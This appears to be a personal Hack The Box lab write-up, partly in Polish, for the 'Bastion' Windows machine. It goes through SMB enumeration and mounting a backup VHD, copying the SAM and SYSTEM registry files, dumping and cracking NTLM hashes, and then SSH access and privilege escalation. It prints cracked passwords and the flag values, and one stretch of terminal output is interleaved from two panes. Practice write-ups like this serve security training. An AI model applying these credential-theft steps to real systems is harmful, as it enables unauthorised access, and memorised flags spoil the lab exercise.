Bastion - 01.08.2021

NMap

┌──(kali㉿kali-os)-[~/htb/bastion]                                                                          
└─$ nmap -sC -sV -oA nmap 10.10.10.134                                                                                                                                                                                                      
PORT      STATE SERVICE      VERSION                                                                                  
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)                                                   
| ssh-hostkey:                                                                                                        
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)                                                        
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)                                                       
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)                                                     
135/tcp   open  msrpc        Microsoft Windows RPC                                                                    
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                            
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds                                          
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                  
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                           
|_http-title: Not Found                                                                                               
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                  
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                           
|_http-title: Not Found                                                                                               
49664/tcp open  msrpc        Microsoft Windows RPC                                                                    
49665/tcp open  msrpc        Microsoft Windows RPC                                                                    
49666/tcp open  msrpc        Microsoft Windows RPC                                                                    
49667/tcp open  msrpc        Microsoft Windows RPC                                                                    
49668/tcp open  msrpc        Microsoft Windows RPC                                                                    
49669/tcp open  msrpc        Microsoft Windows RPC                                                                    
49670/tcp open  msrpc        Microsoft Windows RPC

Host script results:
|_clock-skew: mean: -26m51s, deviation: 1h09m14s, median: 13m06s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-01T00:19:26+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-31T22:19:24
|_  start_date: 2021-07-31T19:34:26

Samba

Próba wylistowania folderów samby. Ciekawy folder Backups

┌──(kali㉿kali-os)-[~/htb/bastion]
└─$ smbclient -N -L //10.10.10.134

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

smbclient -N //10.10.10.134/Backups

note.txt:

Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Inny sposób ( LEPSZY)

mount -t cifs //10.10.10.134/Backups /mnt/samba-bastion/

Montowanie przez mount na lokalna maszyne

Montowanie pliku vhd do /mnt/back

guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/back/

Kopiowanie plików SAM/SYSTEM na linuxa

┌──(kali㉿kali-os)-[/mnt]
└─$ sudo cp backup/Windows/System32/config/SAM ~/htb/bastion 
                                                                                                                     
┌──(kali㉿kali-os)-[/mnt]
└─$ sudo cp backup/Windows/System32/config/SYSTEM ~/htb/bastion

Użycie secretsdump lokalnie aby odczytać hashe użytkowników

┌──(kali㉿kali-os)-[~/htb/bastion]                                                                                    │└─$ sudo ls backup/Windows/system32/config                                                                       2 ⨯
└─$ secretsdump.py -sam SAM -system SYSTEM local                                                                  1 ⚙ │ls: cannot access 'backup/Windows/system32/config': No such file or directory
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation                                │                                                                                                                         │┌──(kali㉿kali-os)-[/mnt]
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f                                                         │└─$ sudo ls backup/Windows/System32/config                                                                       2 ⨯
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                  │BCD-Template                                                                                  SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                │BCD-Template.LOG                                                                              SAM.LOG
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                        │COMPONENTS                                                                                    SAM.LOG1
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::                                      │COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms                            SAM.LOG2
[*] Cleaning up...

Evil-WinRM bezpośrednio z hashami nie działa

Hashcat

hashcat -m 1000 --user hashes /usr/share/wordlists/rockyou.txt

L4mpje:bureaulampje

ssh na tych danych zadziałało

user.txt

9bfe57d5c3309db3a151772f9d86c6cd

Priv Esc

Próba enumeracji przy pomocy PowerUp.ps1

Niestety mierna

Import-Module C:\Windows\temp\aa\power.ps1
Invoke-AllChecks

ModifiablePath    : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps
IdentityReference : BASTION\L4mpje
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw

Administrator:thXLHM96BeKL0ER2

ssh administrator@10.10.10.134

Połączenie przez SSH zadziałało

root.txt

958850b91811676ed6620a9c430e65c8

Bastion - 01.08.2021#

NMap#

Samba#

Inny sposób ( LEPSZY)#

Hashcat#

Priv Esc#